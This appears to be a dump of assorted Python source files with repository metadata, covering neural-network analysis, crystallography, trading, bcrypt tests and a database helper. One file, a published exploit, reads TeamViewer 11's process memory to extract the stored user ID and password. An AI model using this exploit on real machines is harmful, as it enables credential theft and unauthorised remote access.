face_preference = np.mean(f, axis=0) - np.mean(nf, axis=0)
vf = np.var(f, axis=0) + 1e-3 # small constant in case zero variance due to lack of response
vnf = np.var(nf, axis=0) + 1e-3
d_prime = face_preference / np.sqrt((vf + vnf)/2)
network_name = 'vgg' if use_vgg else 'alexnet'
with open('face-preference-' + network_name + '-' + str(remove_level) + '.pkl', 'wb') as file:
pickle.dump(d_prime, file)
print(d_prime)
plt.hist(d_prime)
plt.show()
if True:
use_vgg = False
remove_level = 1
if use_vgg:
model = load_vgg(weights_path='../weights/vgg16_weights.h5', remove_level=remove_level)
else:
model = load_net(weights_path='../weights/alexnet_weights.h5', remove_level=remove_level)
# model = load_net(weights_path='../weights/alexnet_weights.h5')
image_files = get_image_file_list('./images/lehky-processed/', 'png', with_path=True)
im = preprocess(image_files, use_vgg=use_vgg)
start_time = time.time()
out = model.predict(im)
print('prediction time: ' + str(time.time() - start_time))
# with open('lehky.pkl', 'wb') as file:
# pickle.dump(out, file)
# with open('lehky.pkl', 'rb') as file:
# out = pickle.load(file)
n = 674
# use first n or n with greatest responses
if False:
rect = np.maximum(0, out[:,:n])
else:
maxima = np.max(out, axis=0)
ind = np.zeros(n, dtype=int)
c = 0
i = 0
while c < n:
if maxima[i] > 2:
ind[c] = i
c = c + 1
i = i + 1
# ind = (-maxima).argsort()[:n]
rect = np.maximum(0, out[:,ind])
selectivity = excess_kurtosis(rect)
sparseness = excess_kurtosis(rect.T)
print(np.mean(selectivity))
print(np.mean(sparseness))
print(np.max(selectivity))
print(np.max(sparseness))
plot_selectivity_and_sparseness(rect.T, 11)
network_name = 'vgg' if use_vgg else 'alexnet'
plt.savefig('../figures/selectivity-' + network_name + '-' + str(remove_level) + '-talk.eps')
plt.show()
if False:
plt.figure(figsize=(4,3.8))
plt.scatter(3.5, 12.51, c='k', marker='x', s=40, label='IT') # from Lehky et al. Fig 4A and 4B
selectivity_alexnet = [10.53, 28.59, 31.44]
sparseness_alexnet = [4.04, 8.85, 6.61]
selectivity_vgg = [26.79, 14.44, 34.65]
sparseness_vgg = [6.59, 3.40, 3.54]
plt.scatter([10.53, 28.59, 31.44], [4.04, 8.85, 6.61], c='b', marker='o', s=30, label='Alexnet')
plt.scatter([26.79, 14.44, 34.65], [6.59, 3.40, 3.54], c='g', marker='s', s=45, label='VGG-16')
plt.plot([0, 40], [0, 40], 'k')
plt.xlim([0,38])
plt.ylim([0,38])
gap = 0.4
plt.text(3.5+gap, 9.61+gap+.05, 'IT')
plt.text(selectivity_alexnet[0]+gap, sparseness_alexnet[0]+gap, 'out')
plt.text(selectivity_alexnet[1]+gap, sparseness_alexnet[1]+gap, 'out-1')
plt.text(selectivity_alexnet[2]+gap, sparseness_alexnet[2]+gap, 'out-2')
plt.text(selectivity_vgg[0]+gap, sparseness_vgg[0]+gap, 'out')
plt.text(selectivity_vgg[1]+gap, sparseness_vgg[1]+gap, 'out-1')
plt.text(selectivity_vgg[2]+gap, sparseness_vgg[2]+gap, 'out-2')
plt.xlabel('Selectivity')
plt.ylabel('Sparseness')
plt.tight_layout()
plt.savefig('../figures/cnn-selectivity.eps')
plt.show()
if False:
r_mat = rect.T
n_neurons = r_mat.shape[0]
activity_fractions = np.zeros(n_neurons)
for n_idx in np.arange(n_neurons):
rates = r_mat[n_idx, :]
activity_fractions[n_idx] = activity_fraction(rates)
print(activity_fractions)
plt.plot(activity_fractions)
plt.show()
rate = np.mean(rect,0)
# with open('activity-fraction.pkl', 'wb') as file:
# pickle.dump((ind, activity_fractions), file)
# bins = np.linspace(0, 1000, 501)
# plt.figure()
# plt.subplot(2,1,1)
# plt.hist(selectivity, bins)
# # plt.xlim([0, 100])
# # plt.ylim([0, 100])
# plt.subplot(2,1,2)
# plt.hist(sparseness, bins)
# # plt.xlim([0, 100])
# # plt.ylim([0, 100])
# plt.show()
#
# note: there is a NaN due to single kurtosis much less than gaussian
# print(np.corrcoef(np.mean(rect,0), np.log(selectivity+1)))
# plt.figure()
# plt.scatter(np.mean(rect,0), np.log(selectivity+1))
# plt.gca().set_xscale('log')
# plt.gca().set_yscale('log')
# plt.show()
#
# rate = np.mean(rect,0)
# with open('rate-vs-selectivity.pkl', 'wb') as file:
# pickle.dump((ind, rate, selectivity), file)
| true |
140c328d2811837ddd23f8a08b04535f16095430 | Python | jorgediazjr/dials-dev20191018 | /modules/cctbx_project/cctbx/examples/symops_530.py | UTF-8 | 1,277 | 2.984375 | 3 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | """\
Loop over 530 conventional settings of the 230 space groups,
show symmetry operations in various formats.
See also:
List of 530 settings:
Shmueli U, Hall SR, Grosse-Kunstleve RW:
Space-Group Symbols for numeric and symbolic computations.
In International Tables for Crystallography, Volume B:
Reciprocal space, U. Shmueli, Ed.,
Kluwer Academic Publishers (Dordrecht), 2001, 107-119.
Universal Hermann-Mauguin symbols: section 2.1 of:
Zwart P, Grosse-Kunstleve RW, Lebedev AA, Murshudov GN, Adams PD:
Surprises and pitfalls arising from(pseudo)symmetry
Acta Cryst. 2008, D64, 99-107.
http://scripts.iucr.org/cgi-bin/paper?ba5111
"""
from __future__ import absolute_import, division, print_function
from cctbx import sgtbx
def run():
for symbols in sgtbx.space_group_symbol_iterator():
symbol = symbols.universal_hermann_mauguin()
print(symbol)
space_group_info = sgtbx.space_group_info(symbol=symbol)
for s in space_group_info.group():
print(s.as_xyz())
for s in space_group_info.group():
sr = s.as_rational()
print(sr.r.elems, sr.t.elems)
for s in space_group_info.group():
print(s.r().num(), s.r().den(), s.t().num(), s.t().den())
print()
if (__name__ == "__main__"):
run()
| true |
98719ec3b499b1a40d0505f1a9a2c836ae86c1ff | Python | DrMady/PushSwapAPI | /Operations.py | UTF-8 | 1,914 | 2.828125 | 3 | [] | no_license | listA = []
listB = []
def sa(list_ref, pos1, pos2, operation_array):
if list_ref:
get = list_ref[pos1], list_ref[pos2]
list_ref[pos2], list_ref[pos1] = get
operation_array.append('sa')
return list_ref, operation_array
def sb(list_ref, pos1, pos2, operation_array):
if list_ref:
get = list_ref[pos1], list_ref[pos2]
list_ref[pos2], list_ref[pos1] = get
operation_array.append('sb')
return list_ref, operation_array
def sc(operation_array):
sa(listA, 0, 1, operation_array)
sb(listB, 0, 1, operation_array)
operation_array.append('sc')
return operation_array
def pa(list_ref, list_recipient, operation_array):
if list_ref:
list_recipient.insert(0, list_ref.pop(0))
operation_array.append('pa')
return list_ref, operation_array
def pb(list_ref, list_recipient, operation_array):
if list_ref:
list_recipient.insert(0, list_ref.pop(0))
operation_array.append('pb')
return list_ref, operation_array
def ra(list_ref, operation_array):
list_ref.append(list_ref.pop(0))
operation_array.append('ra')
return list_ref, operation_array
def rb(list_ref, operation_array):
list_ref.append(list_ref.pop(0))
operation_array.append('rb')
return list_ref, operation_array
def rr(operation_array):
ra(listA, operation_array)
rb(listB, operation_array)
operation_array.append('rr')
return operation_array
def rra(list_ref, operation_array):
list_ref.insert(0, list_ref.pop(-1))
operation_array.append('rra')
return list_ref, operation_array
def rrb(list_ref, operation_array):
list_ref.insert(0, list_ref.pop(-1))
operation_array.append('rrb')
return list_ref, operation_array
def rrr(operation_array):
rra(listA, operation_array)
rrb(listB, operation_array)
operation_array.append('rrr')
return operation_array
| true |
49c9047b0f64988629156e85fd6747d9213db7e0 | Python | moxis/bitfinex-ladderer | /app.py | UTF-8 | 777 | 3.046875 | 3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | import ccxt
import json
with open("api_key.json", "r") as f:
keys = json.load(f)
bitfinex = ccxt.bitfinex({
'enableRateLimit': True,
**keys,
})
capital = float(input('Total capital: '))
lower_range = float(input("Lower boundary: "))
upper_range = float(input("Upper boundary: "))
d = (upper_range - lower_range)/10
type = input("BUY (1) OR SELL (2): ")
if type == "1":
func = bitfinex.create_limit_buy_order
type_written = "LONG"
else:
func = bitfinex.create_limit_sell_order
type_written = "SHORT"
for x in range(0, 11):
price = round(lower_range + x * d, 1)
amount = round((capital/11)/price, 6)
func('BTC/USDT', amount, price, {'type': 'limit'})
print(f"Placed a {type_written} order for {amount} BTC at a price of {price}")
| true |
068f9ef44880577a82e7da9209da695ee7c78039 | Python | ChuixinZeng/PythonStudyCode | /PythonCode-OldBoy/Day6/随堂练习/subprocess模块下.py | UTF-8 | 3,028 | 2.9375 | 3 | [] | no_license | # -*- coding:utf-8 -*-
# Author:Chuixin Zeng
import subprocess
# 本小节所有实验都在Linux下的命令行里面进行演示操作
# 常用subprocess方法示例(linux)
'''
#执行命令,返回命令执行状态 , 0 or 非0
>>> retcode = subprocess.call(["ls", "-l"])
#执行命令,如果命令结果为0,就正常返回,否则抛异常
>>> subprocess.check_call(["ls", "-l"])
0
#接收字符串格式命令,返回元组形式,第1个元素是执行状态,第2个是命令结果
>>> subprocess.getstatusoutput('ls /bin/ls')
(0, '/bin/ls')
#接收字符串格式命令,并返回结果
>>> subprocess.getoutput('ls /bin/ls')
'/bin/ls'
#执行命令,并返回结果,注意是返回结果,不是打印,下例结果返回给res
>>> res=subprocess.check_output(['ls','-l'])
>>> res
b'total 0\ndrwxr-xr-x 12 alex staff 408 Nov 2 11:05 OldBoyCRM\n'
#上面那些方法,底层都是封装的subprocess.Popen
'''
# popen的例子(Linux)
'''
# 命令中必须加stdout=subprocess.PIPE,否则第二行的执行无结果,不正确
#例子
>>> p = subprocess.Popen("df -h|grep disk",stdin=subprocess.PIPE,stdout=subprocess.PIPE,shell=True)
>>> p.stdout.read()
b'/dev/disk1 465Gi 64Gi 400Gi 14% 16901472 104938142 14% /\n'
stdin 标准输入
stdout 标准输出
stderr 标准错误
poll()
Check if child process has terminated. Returns returncode
print(res.poll()) # 如果命令没执行完,返回none,如果命令执行完了,返回0
wait()
Wait for child process to terminate. Returns returncode attribute.
print(res.wait()) # 这个就是等待结果出来后,再返回结果0
res.terminate() # 杀掉所启动进程
res.communicate() # 等待任务结束,用的非常少
# popen还有其他一些参数可以使用如下
args:shell命令,可以是字符串或者序列类型(如:list,元组)
bufsize:指定缓冲。0 无缓冲,1 行缓冲,其他 缓冲区大小,负值 系统缓冲
stdin, stdout, stderr:分别表示程序的标准输入、输出、错误句柄
preexec_fn:只在Unix平台下有效,用于指定一个可执行对象(callable object),它将在子进程运行之前被调用
close_sfs:在windows平台下,如果close_fds被设置为True,则新创建的子进程将不会继承父进程的输入、输出、错误管道。
所以不能将close_fds设置为True同时重定向子进程的标准输入、输出与错误(stdin, stdout, stderr)。
shell:同上
cwd:用于设置子进程的当前目录
env:用于指定子进程的环境变量。如果env = None,子进程的环境变量将从父进程中继承。
universal_newlines:不同系统的换行符不同,True -> 同意使用 \n
startupinfo与createionflags只在windows下有效
将被传递给底层的CreateProcess()函数,用于设置子进程的一些属性,如:主窗口的外观,进程的优先级等等
终端输入的命令分为两种:
输入即可得到输出,如:ifconfig
输入进行某环境,依赖再输入,如:pytho
'''
| true |
f125c5cedd8d4bffb4d3d71df8da5a1fdff9a40e | Python | ratatouille0822/thread | /test_thread.py | UTF-8 | 386 | 3.375 | 3 | [] | no_license | import time
import threading as th
def sing():
for i in range(1, 5):
time.sleep(1)
print("唱歌")
def dance():
for i in range(1, 5):
time.sleep(1)
print("跳舞")
def main():
t1 = th.Thread(target=sing)
t2 = th.Thread(target=dance)
t1.start()
t2.start()
# sing()
# dance()
if __name__ == "__main__":
main()
| true |
e11ef7fa22620cebd1c3de7105809062b5455527 | Python | PederHA/vjemmie | /vjemmie/utils/sound.py | UTF-8 | 1,511 | 2.90625 | 3 | [
"MIT"
] | permissive | import subprocess
import wave
from pathlib import Path
import shlex
def convert(filepath: Path, to_wav: bool) -> Path:
"""Attempts to convert a file from .mp3 to .wav or vice versa"""
outfile = filepath.with_suffix(".wav") if to_wav else filepath.with_suffix(".mp3")
inf = filepath.absolute()
outf = outfile.absolute()
if to_wav:
cmd = f'ffmpeg -y -i "{inf}" -acodec pcm_u8 -ar 44100 "{outf}"'
else:
cmd = f'ffmpeg -y -i "{inf}" -acodec libmp3lame -ab 128k "{outf}"'
subprocess.Popen(shlex.split(cmd), stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).wait()
return outfile
def join_wavs(file_1: Path, file_2: Path) -> Path:
for p in [file_1, file_2]:
if not p.exists():
# NOTE: Should this error be tailored towards users of the bot or the developer?
raise FileNotFoundError(f"'{p.stem}' does not exist!")
# Get wave file data
wav_data = []
for f in [file_1, file_2]:
with wave.open(str(f), "rb") as w:
wav_data.append([w.getparams(), w.readframes(w.getnframes())])
fname = Path(f"{file_1.parent}/{file_1.stem}_{file_2.stem}.wav")
if fname.exists():
raise FileExistsError(f"{fname.stem} already exists!")
# Join wave files
with wave.open(str(fname), "wb") as wavfile:
wavfile.setparams(wav_data[0][0])
wavfile.writeframes(wav_data[0][1])
wavfile.writeframes(wav_data[1][1])
# Return filename and relative filepath
return fname
| true |
ec42ad8fce4803cb71af0578575bc52cd3fb5f89 | Python | shewey/exploit-db | /platforms/windows/local/40342.py | UTF-8 | 2,653 | 2.53125 | 3 | [] | no_license | #####
# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure
# Tested on Windows 7 64bit, English
# Vendor Homepage @ https://www.teamviewer.com/
# Date 07/09/2016
# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com | @nopernik
#
# Special Thanks to:
# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml)
#
#####
# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.
# There is no need in privilege account access. Credentials are stored in context of regular user.
# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services.
#
# Proof-Of-Concept Code:
#####
from winappdbg import Debug, Process, HexDump
import sys
import re
filename = 'TeamViewer.exe'
def memory_search( pid ):
found = []
# Instance a Process object.
process = Process( pid )
# Search for the string in the process memory.
# Looking for User ID:
userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
for address in process.search_regexp( userid_pattern ):
found += [address]
print 'Possible UserIDs found:'
found = [i[-1] for i in found]
for i in set(found):
print i.replace('\x00','')
found = []
# Looking for Password:
pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
for address in process.search_regexp( pass_pattern ):
found += [process.read(address[0]-3,16)]
if found:
print '\nPassword:'
if len(found) > 1:
s = list(set([x for x in found if found.count(x) > 1]))
for i in s:
pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
print pwd
else:
print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]
return found
debug = Debug()
try:
# Lookup the currently running processes.
debug.system.scan_processes()
# For all processes that match the requested filename...
for ( process, name ) in debug.system.find_processes_by_filename( filename ):
pid = process.get_pid()
memory_search(pid)
finally:
debug.stop()
| true |
fe01d02b293e8922eed311090acd464c68b8cae3 | Python | luccasPh/clean-python-api | /tests/infra/cryptography/test_bcrypt_adapter.py | UTF-8 | 2,248 | 2.859375 | 3 | [] | no_license | import pytest
from mock import patch, MagicMock
from app.infra import BcryptAdapter
SALT = b"$2b$12$9ITqN6psxZRjP8hN04j8Be"
@pytest.fixture
def sut():
sut = BcryptAdapter(SALT)
yield sut
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_call_hash_with_correct_values(
mock_hashpw: MagicMock, sut: BcryptAdapter
):
value = "any_value"
sut.hash(value)
mock_hashpw.assert_called_with(value.encode("utf-8"), SALT)
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_return_hash_on_hash_success(mock_hashpw: MagicMock, sut: BcryptAdapter):
value = "hash"
mock_hashpw.return_value = value.encode("utf-8")
hash = sut.hash("any_value")
assert hash == "hash"
@patch("app.infra.cryptography.bcrypt_adapter.hashpw")
def test_should_raise_exception_if_hash_raise(
mock_hashpw: MagicMock, sut: BcryptAdapter
):
mock_hashpw.side_effect = Exception()
with pytest.raises(Exception) as excinfo:
assert sut.hash("any_value")
assert type(excinfo.value) is Exception
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_call_compare_with_correct_values(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
value = "any_value"
hash = "any_hash"
sut.compare(value, hash)
mock_checkpw.assert_called_with(value.encode("utf-8"), hash.encode("utf-8"))
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_return_true_on_compare_success(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.return_value = True
result = sut.compare("any_value", "any_hash")
assert result
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_return_false_on_compare_fails(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.return_value = False
result = sut.compare("any_value", "any_hash")
assert not result
@patch("app.infra.cryptography.bcrypt_adapter.checkpw")
def test_should_raise_exception_if_compare_raise(
mock_checkpw: MagicMock, sut: BcryptAdapter
):
mock_checkpw.side_effect = Exception()
with pytest.raises(Exception) as excinfo:
assert sut.compare("any_value", "any_hash")
assert type(excinfo.value) is Exception
| true |
9c36d30c2d092823ec16d07cefe1c905e41ba2c1 | Python | yangjiahao106/LeetCode | /Python3/62_Unique_Paths.py | UTF-8 | 1,576 | 3.484375 | 3 | [
"MIT"
] | permissive | #! python3
# __author__ = "YangJiaHao"
# date: 2018/2/28
class Solution:
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
dp = [[1, 1]]
while True:
temp = []
flag = False
for l in dp:
if l[0] < m:
temp.append([l[0] + 1, l[1]])
flap = True
if l[1] < n:
temp.append([l[0], l[1] + 1])
flag = True
if l[0] == m and l[1] == n:
temp.append(l)
dp = temp
if flag == False:
return len(dp)
class Solution2:
def uniquePaths(self, m, n):
"""
:type m: int
:type n: int
:rtype: int
"""
dp = [[1] * n for i in range(m)] # 第一行,和第一列需要初始化为1
for i in range(1, m):
for j in range(1, n):
dp[i][j] = dp[i][j - 1] + dp[i - 1][j]
return dp[-1][-1]
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
dp = [[0] * (n + 1) for i in range(m + 1)]
for row in range(1, m + 1):
for col in range(1, n + 1):
if row == 1 and col == 1: # 起始位置设为1
dp[row][col] = 1
else:
dp[row][col] = dp[row - 1][col] + dp[row][col - 1]
return dp[-1][-1]
if __name__ == '__main__':
so = Solution2()
res = so.uniquePaths(2, 2)
print(res)
| true |
815a3ad913d59f20ec73d124fb41fe54b723800e | Python | chenghao/web_setup | /db/dbutil.py | UTF-8 | 11,191 | 2.546875 | 3 | [] | no_license | # coding:utf-8
__author__ = 'chenghao'
'''
Database operation module. This module is independent with web module.
'''
import time, functools, threading
from config import logger
from utils import Dict
def _profiling(start, sql=''):
t = time.time() - start
if t > 0.1:
logger.warning('[PROFILING] [DB] %s: %s' % (t, sql))
else:
logger.info('[PROFILING] [DB] %s: %s' % (t, sql))
class DBError(Exception):
pass
class MultiColumnsError(DBError):
pass
def _log(s):
logger.debug(s)
def _dummy_connect():
'''
Connect function used for get db connection. This function will be relocated in init(dbn, ...).
'''
raise DBError('Database is not initialized. call init(dbn, ...) first.')
_db_connect = _dummy_connect
_db_convert = '?'
class _LasyConnection(object):
def __init__(self):
self.connection = None
def cursor(self):
if self.connection is None:
_log('open connection...')
self.connection = _db_connect()
return self.connection.cursor()
def commit(self):
self.connection.commit()
def rollback(self):
self.connection.rollback()
def cleanup(self):
if self.connection:
connection = self.connection
self.connection = None
_log('close connection...')
connection.close()
class _DbCtx(threading.local):
'''
Thread local object that holds connection info.
'''
def __init__(self):
self.connection = None
self.transactions = 0
def is_init(self):
return not self.connection is None
def init(self):
_log('open lazy connection...')
self.connection = _LasyConnection()
self.transactions = 0
def cleanup(self):
self.connection.cleanup()
def cursor(self):
'''
Return cursor
'''
return self.connection.cursor()
_db_ctx = _DbCtx()
class _ConnectionCtx(object):
'''
_ConnectionCtx object that can open and close connection context. _ConnectionCtx object can be nested and only the most
outer connection has effect.
with connection():
pass
with connection():
pass
'''
def __enter__(self):
global _db_ctx
self.should_cleanup = False
if not _db_ctx.is_init():
_db_ctx.init()
self.should_cleanup = True
return self
def __exit__(self, exctype, excvalue, traceback):
global _db_ctx
if self.should_cleanup:
_db_ctx.cleanup()
def connection():
'''
Return _ConnectionCtx object that can be used by 'with' statement:
with connection():
pass
'''
return _ConnectionCtx()
def with_connection(func):
'''
Decorator for reuse connection.
@with_connection
def foo(*args, **kw):
f1()
f2()
f3()
'''
@functools.wraps(func)
def _wrapper(*args, **kw):
with _ConnectionCtx():
return func(*args, **kw)
return _wrapper
class _TransactionCtx(object):
'''
_TransactionCtx object that can handle transactions.
with _TransactionCtx():
pass
'''
def __enter__(self):
global _db_ctx
self.should_close_conn = False
if not _db_ctx.is_init():
# needs open a connection first:
_db_ctx.init()
self.should_close_conn = True
_db_ctx.transactions = _db_ctx.transactions + 1
_log('begin transaction...' if _db_ctx.transactions == 1 else 'join current transaction...')
return self
def __exit__(self, exctype, excvalue, traceback):
global _db_ctx
_db_ctx.transactions = _db_ctx.transactions - 1
try:
if _db_ctx.transactions == 0:
if exctype is None:
self.commit()
else:
self.rollback()
finally:
if self.should_close_conn:
_db_ctx.cleanup()
def commit(self):
global _db_ctx
_log('commit transaction...')
try:
_db_ctx.connection.commit()
_log('commit ok.')
except:
logger.warning('commit failed. try rollback...')
_db_ctx.connection.rollback()
logger.warning('rollback ok.')
raise
def rollback(self):
global _db_ctx
_log('manully rollback transaction...')
_db_ctx.connection.rollback()
logger.info('rollback ok.')
def transaction():
'''
Create a transaction object so can use with statement:
with transaction():
pass
'''
return _TransactionCtx()
def with_transaction(func):
'''
A decorator that makes function around transaction.
'''
@functools.wraps(func)
def _wrapper(*args, **kw):
_start = time.time()
with _TransactionCtx():
return func(*args, **kw)
_profiling(_start)
return _wrapper
def _select(sql, first, *args):
' execute select SQL and return unique result or list results.'
global _db_ctx, _db_convert
cursor = None
if _db_convert != '?':
sql = sql.replace('?', _db_convert)
_log('SQL: %s, ARGS: %s' % (sql, args))
start = time.time()
try:
cursor = _db_ctx.connection.cursor()
cursor.execute(sql, args)
if cursor.description:
names = [x[0] for x in cursor.description]
if first:
values = cursor.fetchone()
if not values:
return None
return Dict(names, values)
return [Dict(names, x) for x in cursor.fetchall()]
finally:
if cursor:
cursor.close()
_profiling(start, sql)
@with_connection
def select_one(sql, *args):
'''
Execute select SQL and expected one result.
If no result found, return None.
If multiple results found, the first one returned.
'''
return _select(sql, True, *args)
@with_connection
def select_int(sql, *args):
'''
Execute select SQL and expected one int and only one int result.
MultiColumnsError: Expect only one column.
'''
d = _select(sql, True, *args)
if len(d) != 1:
raise MultiColumnsError('Expect only one column.')
return d.values()[0]
@with_connection
def select(sql, *args):
'''
Execute select SQL and return list or empty list if no result.
> u1 = dict(id=200, name='Wall.E', email='wall.e@test.org', passwd='back-to-earth', last_modified=time.time())
> u2 = dict(id=201, name='Eva', email='eva@test.org', passwd='back-to-earth', last_modified=time.time())
> insert('user', **u1)
1
> insert('user', **u2)
1
> L = select('select * from user where id=?', 900900900)
> L
[]
> L = select('select * from user where id=?', 200)
> L[0].email
u'wall.e@test.org'
> L = select('select * from user where passwd=? order by id desc', 'back-to-earth')
> L[0].name
u'Eva'
> L[1].name
u'Wall.E'
'''
return _select(sql, False, *args)
@with_connection
def _update(sql, args, post_fn=None):
global _db_ctx, _db_convert
cursor = None
if _db_convert != '?':
sql = sql.replace('?', _db_convert)
_log('SQL: %s, ARGS: %s' % (sql, args))
start = time.time()
try:
cursor = _db_ctx.connection.cursor()
cursor.execute(sql, args)
r = cursor.rowcount
if _db_ctx.transactions == 0:
# no transaction enviroment:
_log('auto commit')
_db_ctx.connection.commit()
post_fn and post_fn()
return r
finally:
if cursor:
cursor.close()
_profiling(start, sql)
def insert(table, **kw):
'''
Execute insert SQL.
> u1 = dict(id=2000, name='Bob', email='bob@test.org', passwd='bobobob', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 2000)
> u2.name
u'Bob'
> insert('user', **u2)
Traceback (most recent call last):
...
IntegrityError: column id is not unique
'''
cols, args = zip(*kw.iteritems())
sql = 'insert into %s (%s) values (%s)' % (table, ','.join(cols), ','.join([_db_convert for i in range(len(cols))]))
return _update(sql, args)
def update(sql, *args):
'''
Execute update SQL.
> u1 = dict(id=1000, name='Michael', email='michael@test.org', passwd='123456', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 1000)
> u2.email
u'michael@test.org'
> u2.passwd
u'123456'
> update('update user set email=?, passwd=? where id=?', 'michael@example.org', '654321', 1000)
1
> u3 = select_one('select * from user where id=?', 1000)
> u3.email
u'michael@example.org'
> u3.passwd
u'654321'
'''
return _update(sql, args)
def update_kw(table, where, *args, **kw):
'''
Execute update SQL by table, where, args and kw.
> u1 = dict(id=900900, name='Maya', email='maya@test.org', passwd='MAYA', last_modified=time.time())
> insert('user', **u1)
1
> u2 = select_one('select * from user where id=?', 900900)
> u2.email
u'maya@test.org'
> u2.passwd
u'MAYA'
> update_kw('user', 'id=?', 900900, name='Kate', email='kate@example.org')
1
> u3 = select_one('select * from user where id=?', 900900)
> u3.name
u'Kate'
> u3.email
u'kate@example.org'
> u3.passwd
u'MAYA'
'''
if len(kw) == 0:
raise ValueError('No kw args.')
sqls = ['update', table, 'set']
params = []
updates = []
for k, v in kw.iteritems():
updates.append('%s=?' % k)
params.append(v)
sqls.append(', '.join(updates))
sqls.append('where')
sqls.append(where)
sql = ' '.join(sqls)
params.extend(args)
return update(sql, *params)
def init_connector(func_connect, convert_char='%s'):
global _db_connect, _db_convert
_log('init connector...')
_db_connect = func_connect
_db_convert = convert_char
def init(db_type, db_schema, db_host, db_port=0, db_user=None, db_password=None, db_driver=None, **db_args):
'''
Initialize database.
Args:
db_type: db type, 'mysql', 'sqlite3'.
db_schema: schema name.
db_host: db host.
db_user: username.
db_password: password.
db_driver: db driver, default to None.
**db_args: other parameters, e.g. use_unicode=True
'''
global _db_connect, _db_convert
if db_type == 'mysql':
_log('init mysql...')
import MySQLdb
if not 'use_unicode' in db_args:
db_args['use_unicode'] = True
if not 'charset' in db_args:
db_args['charset'] = 'utf8'
if db_port == 0:
db_port = 3306
_db_connect = lambda: MySQLdb.connect(db_host, db_user, db_password, db_schema, db_port, **db_args)
_db_convert = '%s'
elif db_type == 'sqlite3':
_log('init sqlite3...')
import sqlite3
_db_connect = lambda: sqlite3.connect(db_schema)
else:
raise DBError('Unsupported db: %s' % db_type) | true |
2a1a3195e8cbfc6ad74c924d3b91b2042e9c2e66 | Python | DictaVizor/sitec-redesign | /sitec/sitec_api/utils.py | UTF-8 | 166 | 3.421875 | 3 | [] | no_license | def chunks(list, n):
for i in range(0, len(list), n):
yield list[i:i + n]
def clean_spanish_characters(string):
return string.replace('\ufffd', 'ñ') | true |
fb9adec00db74be316e4303378df8a4b09322db3 | Python | daniel-reich/turbo-robot | /GYJcHcgbpKYE75vYd_14.py | UTF-8 | 1,046 | 4.1875 | 4 | [] | no_license | """
Create a function that takes an integer and returns it as an **ordinal
number**. An Ordinal Number is a number that tells the position of something
in a list, such as 1st, 2nd, 3rd, 4th, 5th, etc.
### Examples
return_end_of_number(553) ➞ "553-RD"
return_end_of_number(34) ➞ "34-TH"
return_end_of_number(1231) ➞ "1231-ST"
return_end_of_number(22) ➞ "22-ND"
return_end_of_number(412) ➞ "412-TH"
### Notes
Check the **Resources** tab for more info on _ordinal numbers_.
"""
def return_end_of_number(num):
num = str(num)
if num.endswith('0') or num.endswith('4') or num.endswith('5') or num.endswith('6') or num.endswith('7') or num.endswith('8') or num.endswith('9'):
return num + '-TH'
else:
if num.endswith('1'):
if num.endswith('11'):
return num + '-TH'
return num+'-ST'
if num.endswith('2'):
if num.endswith('12'):
return num + '-TH'
return num+'-ND'
if num.endswith('13'):
return num+'-TH'
return num+'-RD'
| true |
d83d6469065af70ed1dbdf403ef7fcdd61d3e5f5 | Python | monique-tukaj/curso-em-video-py | /Exercises/ex057.py | UTF-8 | 430 | 4.03125 | 4 | [
"MIT"
] | permissive | '''Faça um programa que leia o sexo de uma pessoa, mas só aceite
os valores "M" ou "F". Caso este esteja errado, peça a digitação
novamente até ter um valor correto.'''
r = 'M' and 'F'
while r == 'F' or r == 'M':
r = str(input('Type your gender? [F/M]')).upper().strip()
if r != 'M' or r != 'F':
print('Try one time, please. Gender not found')
else:
print(f'Gender {r} selected.')
print('Fim') | true |
ba787fbae6d7751767dbc3242efb419ec3a16c7d | Python | k23040198/270201041 | /lab2/example2.py | UTF-8 | 89 | 3.09375 | 3 | [] | no_license | x=1
y=4
z=0.25
result=((((2*x)+y)**2)*(z**(1/2)))/(((x**(1/2))+(y**(1/2))))
print(result) | true |
fd0e9a60037537c035151a5929b3b3f1addd4c10 | Python | p4k03n4t0r/protocols-in-python | /https-client/tls_message_packer.py | UTF-8 | 10,885 | 2.625 | 3 | [] | no_license | from crypto_helper import Crypto_Helper
# This method offers helper methods to pack an instance of a TLS_Message into bytes
class TLS_Message_Packer:
@staticmethod
def pack_tls_message(
tls_message, client_handshake_key, client_handshake_iv, counter
):
# change_cipher_spec (x14/20)
if tls_message.message_type == b"\x14":
# this message type always has a body with 0x01
message = b"\x01"
# alert (x15/19)
elif tls_message.message_type == b"\x15":
raise Exception("Packing alert is not yet supported")
# handshake (x16/22) or application_data (x17/23)
elif tls_message.message_type == b"\x16" or tls_message.message_type == b"\x17":
# we pack the request backwards, because we have to know the length of the other parts
handshake_content = TLS_Message_Packer.pack_handshake_content(tls_message)
